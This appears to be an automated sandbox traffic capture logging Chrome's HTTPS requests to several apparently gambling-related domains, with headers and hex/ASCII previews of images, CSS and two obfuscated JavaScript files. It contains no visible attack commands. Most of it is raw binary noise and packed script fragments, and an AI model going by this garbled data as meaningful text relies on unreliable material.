                                                                                                                                                          2024-06-09 22:41:16 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:16 UTC4276INData Raw: 9a d3 06 04 90 0e 23 3a a7 2a 40 9e 74 40 e0 bc 12 6c ec 17 7c 8f 27 6f 22 f1 ac 4c 89 1c d3 ed 3e 39 67 7d c5 23 67 e8 02 fd 06 bd 7a d0 81 eb 40 b9 74 2e 13 89 a8 d7 4b 44 28 9e 74 7d c4 4b 07 28 c3 7d 95 f6 36 ea ca 38 d8 2d 9e 46 38 5d 2d f7 06 96 38 a4 b4 b9 0b e3 ae e8 24 0a 01 ee 8c b4 fa 4e 9b 4b b6 df a0 c1 3f cb df c4 7d 35 1e ee de ed af bc 83 1c eb 2c 1d e7 26 b5 cf d8 70 dc e6 2e ef 2d 3e 65 1f fe 1d c8 5a da 49 23 5e 47 18 7d e4 c6 8a 77 00 11 b7 32 fd 20 ab 03 4d a7 42 b7 56 c8 62 cd d2 a7 1c 7e 1c bf 6f 1c 6b 9a c7 9d 1e 5a 9d 47 87 3f 67 d0 6a 0f 92 fb 73 ca 78 56 54 db c7 c4 72 36 d6 bc a7 f4 70 b7 f7 56 d3 23 5a ba d1 4c 31 23 20 dd e3 0d 58 c0 20 28 24 93 50 34 1e 6d a6 3a ad 3a b1 f0 22 17 9b 1f 6f 33 4e 0b 77 00 8b ca 40 f1 04 6a e4
                                                                                                                                                          Data Ascii: #:*@t@l|'o"L>9g}#gz@t.KD(t}K(}68-F8]-8$NK?}5,&p.->eZI#^G}w2 MBVb~okZG?gjsxVTr6pV#ZL1# X ($P4m::"o3Nw@j


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          473192.168.2.55024390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC635OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE6[414],EU-GER-frankfurt-GLOBAL1-CACHE7[403,TCP_MISS,407],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 7fa609bba502d94319d11272c61d8e44
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814505
                                                                                                                                                          X-CCDN-Expires: 2464115
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC15676INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          474192.168.2.55024990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC556OUTGET /pc/240516-03/static/js/components/312/menuSub.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC644INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 3892
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:40 GMT
                                                                                                                                                          ETag: "6645ca84-f34"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[16],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,13],EU-GER-frankfurt-GLOBAL1-CACHE3[322],EU-GER-frankfurt-GLOBAL1-CACHE1[314,TCP_MISS,316],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b398f591f65700d067108eb8a69c2802
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121447
                                                                                                                                                          X-CCDN-Expires: 1470553
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC3892INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 6e 77 48 59 42 64 41 47 67 47 38 42 68 41 52 51 48 45 42 70 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 75 5a 4a 41 45 6f 4b 41 58 7a 49 41 72 41 44 59 41 4a 41 4f 61 73 4f 33 50 6d 67 46 43 79 50 55 51 43 49 32 53 45 41 41 49 6b 58 41 45 34 39 75 32 67 4e 77 42 35 4d 4a 4a 44 63 41 64 41 42 4d 51 4c 48 6d 68 41 41 46 45 79 67 67 67 54 4c 67 42 50 54 43 51 79 62 51 42 39 43 4a 41 6b 41 46 6b 55 5a 7a 5a 70 45 47 31 4b 41 44 63 6f 61 54 59 51 4a 67 42 43 41 41 59 78 59 55 73 4d 6b 77 4d 51 41 46 34 65 54 47 31 38 6d 41 67 57 62 57 45 79 4e 41 71 4b 43 46 38 49 4a 43 5a 73 62 53 51 32 4d 46 54 74 41 46 73 6f 41 41 38 68 6a 31 63 4a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZnwHYBdAGgG8BhARQHEBpALgDMBXNGAFwEt1MuZJAEoKAXzIArADYAJAOasO3PmgFCyPUQCI2SEAAIkXAE49u2gNwB5MJJDcAdABMQLHmhAAFEygggTLgBPTCQybQB9CJAkAFkUZzZpEG1KADcoaTYQJgBCAAYxYUsMkwMQAF4eTG18mAgWbWEyNAqKCF8IJCZsbSQ2MFTtAFsoAA8hj1cJ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          475192.168.2.550245183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC589OUTGET /061410/rcenter/msites/themes/default/common.css?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:17 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 434
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-04-07
                                                                                                                                                          ETag: "655579ca-1b2"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:17 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;huzmp04:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-HUZ-MP-04-07
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-20
                                                                                                                                                          X-Cdn-Request-ID: 558e20a32392c3ede6608084f9d184b5
                                                                                                                                                          2024-06-09 22:41:17 UTC434INData Raw: 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 62 61 73 65 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 62 61 73 65 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2f 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 66 6f 6e 74 2d 61 77
                                                                                                                                                          Data Ascii: @import "../base.css";@import "../../../common/themes/base.css";@import "../../../common/themes/default/bootstrap/bootstrap.css";@import "../../../common/themes/default/bootstrap-dialog/bootstrap-dialog.css";@import "../../../common/themes/default/font-aw


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          476192.168.2.55025090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC609OUTGET /pc/image-pc/footer/new/footer_gray_01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:17 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40722
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jun 2022 08:13:12 GMT
                                                                                                                                                          ETag: "62a05a18-9f12"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[6],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE12[3],EU-FRA-paris-GLOBAL1-CACHE29[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465105
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: bbc125b791db49c216070a2b94de80e5
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126895
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:17 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 c3 00 00 00 2d 08 06 00 00 00 8a d3 b9 59 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 c0 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 2c 20 32 30 32 31 2f 31 32 2f 30 38 2d 31 39 3a 31 31 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52
                                                                                                                                                          Data Ascii: PNGIHDR-YpHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:R
                                                                                                                                                          2024-06-09 22:41:17 UTC16384INData Raw: 86 86 85 85 2d 35 99 4c 82 aa aa 57 c4 f8 bf f0 c2 0b 6e 00 68 b7 7e fd fa c7 4c 26 d3 bb 11 11 11 9d 4d 26 53 e9 c6 8d 1b 57 f5 ed db 77 64 9f 3e 7d de dd b8 71 e3 f3 b1 b1 b1 7d 43 42 42 1a 06 b8 37 22 83 c1 50 a7 6f df be 9f af 5f bf 3e 4d 96 e5 5d 7a 03 cf f3 42 61 61 e1 91 be 7d fb 76 db ba 75 eb e9 c8 c8 48 7f 2c 9d 28 8a 5d 78 9e e7 75 39 65 65 65 b6 17 5e 78 a1 74 c3 86 0d 83 c2 c3 c3 a7 ea b1 8c 85 85 85 e7 7a f4 e8 d1 0e 00 60 ff fe fd 19 fa 6f cd e7 e9 d4 41 14 c5 93 01 65 69 90 c9 64 7a a9 6f df be 6f 6f de bc f9 db e8 e8 e8 fb 01 00 64 59 fe c6 62 b1 4c 96 65 19 9c 4e e7 37 fa 1a 36 6c d8 30 31 32 32 32 4d 55 55 96 97 97 d7 73 c0 80 01 ef 01 00 d4 ab 57 8f 53 55 15 2b 8a 02 18 e3 b4 c8 c8 c8 78 97 cb 45 f3 f3 f3 1f 1f 30 60 c0 e7 be f9 07 05
                                                                                                                                                          Data Ascii: -5LWnh~L&M&SWwd>}q}CBB7"Po_>M]zBaa}vuH,(]xu9eee^xtz`oAeidzooodYbLeN76l01222MUUsWSU+xE0`
                                                                                                                                                          2024-06-09 22:41:17 UTC8571INData Raw: fa 21 8a 22 35 18 0c 85 00 50 02 00 c1 8a a2 44 07 d6 fa d5 fb 98 4c a6 6e fd fb f7 ff b0 f2 e4 55 11 62 84 10 18 8d 46 85 e7 f9 42 00 d0 08 21 e1 1e 8f c7 52 39 0e c5 6a b5 16 7e fe f9 e7 b1 95 c9 f8 f2 e5 cb a9 4e c4 39 8e 83 91 23 47 de 30 a1 cd ce ce fe c4 66 b3 b5 d7 8f 6f 31 19 9e 8a 10 ca 88 8c 8c 84 67 9e 79 c6 5f 3e 67 d7 ae 5d 90 97 f7 d7 c3 72 3b 76 ec 08 8b 17 df 5a c5 3d cf f3 da 9a 35 6b ae 5b ba a0 32 ae 47 86 a7 4d 9b b6 3e 2d 2d ad 7f 55 6d 49 49 49 32 42 48 d4 4b d5 f8 ea 4b 76 ce c8 c8 d8 97 9c 9c ec e2 38 ce 74 23 b1 e1 9a a6 a9 82 20 0c 4a 4e 4e de 08 50 ae 05 62 8c fd 22 08 42 f0 f5 c6 02 94 d7 1c 45 08 fd 27 35 35 75 f8 8d f4 ff a7 18 39 72 e4 d6 d2 d2 d2 e7 03 c9 69 20 74 92 5b d9 2d 38 30 a6 58 27 cb 3a f4 bf 43 60 e9 a4 40 79 81
                                                                                                                                                          Data Ascii: !"5PDLnUbFB!R9j~N9#G0fo1gy_>g]r;vZ=5k[2GM>--UmIII2BHKKv8t# JNNPb"BE'55u9ri t[-80X':C`@y


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          477192.168.2.55025190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC550OUTGET /pc/240516-03/static/js/components/bonus.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1740
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:46 GMT
                                                                                                                                                          ETag: "6645cac6-6cc"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,1],EU-GER-frankfurt-GLOBAL1-CACHE4[310],EU-GER-frankfurt-GLOBAL1-CACHE5[306,TCP_MISS,308],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 292e70896157ff630450a9b6bc9d77a6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823394
                                                                                                                                                          X-CCDN-Expires: 768606
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC1740INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 67 48 59 41 6d 41 58 51 42 6f 42 76 41 56 51 43 55 42 4e 41 4c 77 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 4e 33 4b 38 41 6c 4a 51 43 2b 35 41 45 34 42 7a 41 4a 77 42 50 4e 70 78 37 38 30 67 34 65 52 52 69 41 52 4f 79 51 67 41 42 45 6d 35 54 65 50 48 51 47 34 41 38 6d 41 42 57 49 48 67 44 6f 41 4a 69 46 61 38 30 49 41 41 70 53 55 45 45 43 6c 75 42 55 78 65 63 68 30 41 66 51 69 51 4a 41 42 5a 46 42 64 32 41 42 73 51 48 53 6f 41 4e 79 67 6b 39 68 42 6d 41 45 49 41 42 6e 45 52 53 30 79 70 51 7a 51 41 58 68 52 4d 48 51 41 52 46 77 41 4f 59 42 30 52 63 68 42 71 70 33 55 30 4e 71 52 71 32 6f 4b 59 43 46 5a 57 36 58 36 64 41 44 6c 36 41
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAmAXQBoBvAVQCUBNALwC4AzAVzRgBcBLdTN3K8AlJQC+5AE4BzAJwBPNpx780g4eRRiAROyQgABEm5TePHQG4A8mABWIHgDoAJiFa80IAApSUEECluBUxech0AfQiQJABZFBd2ABsQHSoANygk9hBmAEIABnERS0ypQzQAXhRMHQARFwAOYB0RchBqp3U0NqRq2oKYCFZW6X6dADl6A


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          478192.168.2.550244183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC593OUTGET /061410/rcenter/msites/themes/default/lang/zh_CN.css?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:17 UTC610INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-27
                                                                                                                                                          ETag: "655579ca-0"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:17 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-24-27
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-29
                                                                                                                                                          X-Cdn-Request-ID: ad89645700ac13846fe2220ce292a7f7


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          479192.168.2.550246183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC590OUTGET /061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
